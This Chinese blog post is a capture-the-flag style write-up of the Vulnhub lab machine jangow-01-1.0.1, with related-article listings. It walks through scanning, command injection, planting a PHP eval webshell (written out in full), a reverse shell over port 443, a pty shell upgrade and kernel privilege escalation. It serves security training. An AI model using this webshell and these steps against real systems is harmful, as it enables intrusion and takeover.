jangow-01-1.0.1 靶机渗透

已于 2024-05-22 17:42:10 修改
阅读量313 收藏 3
点赞数 7
分类专栏: Vulnhub靶机实战 文章标签: 网络安全 web安全 web 网络 安全
于 2024-04-06 18:02:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/braty_/article/details/137434042
版权

目录

信息收集部分:

1.nmap存活探测:

2.nmap端口探测:

3.nmap服务探测:

web:

1.web渗透:

2.反弹shell:

提权

信息收集部分:

1.nmap存活探测:

2.nmap端口探测:

3.nmap服务探测:

这里应该是21和80端口,,但21需要登陆访问,用不了,问题不大。

web:

页面:

发现RCE:

1.web渗透:

我们先创建一个新文件,写入一个一句话木马,,

echo '<?php echo "success";eval($_POST["shell"]); ?>' >shell.php

上传成功,蚁剑连接。

2.反弹shell:

这里尝试好多次,都连不上。

看了一些大佬的wp,发现该靶机只能用443端口,防火墙做了限制。

我们再次反弹shell,,成功。

交互式shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

提权:

我们直接内核提权:

这里发现下载有问题,靶机下载不了,我们直接蚁剑上传

靶机编译执行

查看flag:

哦对了,我们看看防火墙设置:

果然是防火墙的策略导致其他端口反弹shell失败。

kitha.
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2610
迟到的文章,就当库存发出来吧~
Vulnhub-jangow-01-1.0.1靶场练习笔记
qq_54060725的博客
04-17 137
searchsploit搜索ubuntu16.04。把45010.c的代码复制出来,使用蚁剑上传。主机开放21(ftp)和80端口。内核版本是ubuntu16.04。打开终端,查看系统信息进行提权。写入shell.php反弹nc。访问shell.php触发反弹。dirsearch爆破目录。利用echo写入一句话木马。切换完整的交互式bash。发现.backup文件。这里只能反弹443端口。nmap扫描主机端口。gcc编译eva.c。
VulnHub之JANGOW-01-1.0.1渗透
m0_73481504的博客
03-06 354
1.了解命令执行漏洞2.一句话木马,反弹shell3.中国蚁剑的使用4.Ubuntu 4.4.0-31漏洞利用。
渗透测试Jangow1.0.1--入门级
G208_522的博客
03-25 5650
渗透测试Jangow101(一) 一、环境搭建 1、靶机:ip:192.168.0.9 靶机下载:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova 2、攻击机:ip:192.168.0.11 3、如何搭建 下载后的文件直接右键打开方式,选择virtualbox(介意使用virtualbox) 使用virtualbox打开后会显示靶机ip 二、信息收集 1、nmap扫描开放端口 nmap -sC -sV 192.168.0.9 -sV 扫描目
jangow-01-1.0.1靶机
ybkj6666的博客
11-02 148
使用arp-scan 从网络接口配置生成地址,来查看ip输入命令:arp-scan -l输入命令:nmap -min-rate 10000 -p- 192.168.187.163可以看到开放2个端口输入命令:nmap -sU -min-rate 10000 -p- 192.168.187.163这里可以看到有一个80端口但是是关闭状态,那我们不用管它输入命令:nmap -sC -sT -sV -O -p 21,80 192.168.187.163输入命令:nmap --script=vuln -
【vulnhub--JANGOW: 1.0.1靶机练习】
qq_74240553的博客
01-24 870
将ova文件直接拖进vm中,如果有报错,重试一下就好,没有什么其他什么的修改网络模式为NAT,这样靶机和攻击机就可以是同一网段了设置好这些后,直接开机,开打查看攻击机ip攻击机ip为 192.168.47.156扫描网段结果知道靶机ip为??啊这么没有扫出来看了才知道,这里要用virtualbox,那就下载一个virtualbox下载地址:然后把网络模式调成桥接模式这样就可以还是在同一个网段了。
Vulnhub - JANGOW: 1.0.1
shuozhuqiu6452的博客
12-05 124
vulnhub - JANGOW: 1.0.1
【Vulnhub靶场】JANGOW: 1.0.1
Nailaoyyds的博客
06-02 657
开局是给IP的 二、web渗透 但是只能查看文件,并不能登录。需要进行下一步操作 翻找敏感文件
靶机渗透练习18-Jangow
hirak0的博客
04-16 486
靶机描述 靶机地址:https://www.vulnhub.com/entry/jangow-101,754/ Description Difficulty: easy The secret to this box is enumeration! Inquiries jangow2021@gmail.com This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v
jangow-01-1.0.1
01-19
vulnhub的靶机jangow-01-1.0.1 Description Difficulty: easy The secret to this box is enumeration! Inquiries jangow2021@gmail.com This works better with VirtualBox rather than VMware ## Changelog 2021-...
rocketmq-console-ng-1.0.1.jar
07-22
java -jar rocketmq-console-ng-1.0.1.jar 启动 ---当终端断了该服务就会停止 nohup java -jar rocketmq-console-ng-1.0.1.jar >>/soft/RocketMQ/rocketmqlogs/log.out 2>&1 & 后台启动 --当终端断了也不会停止服务
我的世界光影SEUS-Renewed-v1.0.1.zip
05-16
SEUS最好看的光影,调色真实好看
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8268
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全的神秘世界】使用vulhub搭建漏洞测试靶场
weixin_54750312的博客
05-31 340
Vulhub是一个基于docker和的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
网络安全的神秘世界】在win11搭建pikachu靶场
weixin_54750312的博客
05-31 753
这个错误发生在mysql 5.7 版本及以上版本会出现的问题,在mysql5.7版本默认的sql配置是:sql_mode=“ONLY_FULL_GROUP_BY”,这个配置严格执行了"SQL92标准",很多从5.6升级到5.7时,为了语法兼容,大部分都会选择调整sql_mode,使其保持跟5.6一致,为了尽量兼容程序。访问http://pikachu/install.php,这是pikachu自带的初始化数据库的php文件。ok,重新访问首页(index.php),进行测试,成功解决。点击“安装/初始化”
HFish蜜罐实践:网络安全防御的主动出击
weixin_43822401的博客
05-29 734
HFish蜜罐作为一种主动防御工具,通过模拟易受攻击的服务,吸引攻击者,不仅能有效捕获攻击行为,还能为安全分析和溯源提供宝贵信息。HFish蜜罐作为一种先进的网络安全防御工具,不仅能够有效地捕获和分析攻击行为,还能为安全专家提供攻击溯源的重要线索。为每个节点配置蜜罐服务,如FTP、SSH、Telnet等,这些服务作为诱饵,用于吸引并捕获攻击者的行为。收集所有连接和攻击节点的IP信息,通过分析这些信息,刻画攻击者画像,构建私有情报库。利用攻击者使用的工具漏洞,进行信息提取和溯源,确定攻击者的身份和来源。
【Python安全攻防】【网络安全】一、常见被动信息搜集手段
weixin_43031313的博客
05-28 1023
执行上述命令后,导入会报错(找不到Whois模块)(在PyCharm中,IDLE则未出现此问题),需要在报错处再次执行安装命令。《Python安全攻防——渗透测试实战指南》,MS08067安全实验室 编著,北京,机械工业出版社,2021年10月第1版。:用来查询域名是否已经被注册,以及注册域名的详细信息。参数host为目标的URL,返回对应的ip地址。:通过目标URL查询目标的IP地址。
网络安全Web安全基础 - 第一节:使用软件及环境介绍
最新发布
goldfish8848的博客
06-01 1056
它旨在提供一个可实践的安全训练环境,帮助安全专业人员、Web开发者以及爱好者们测试自己的技能,学习如何识别和修复Web应用中的安全漏洞。DVWA是一个易受攻击的PHP/MySQL Web应用程序,其主要目标是帮助安全专业人员在法律允许的环境中测试他们的技能和工具,帮助Web开发人员更好的了解和保护Web应用程序的过程。LAMP是指一组常用来搭建动态网站或者服务器的开源软件,本身都是各自独立的程序,但是因为常被放在一起使用,拥有了越来越高的兼容度,共同组成了一个强大的Web应用程序平台。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值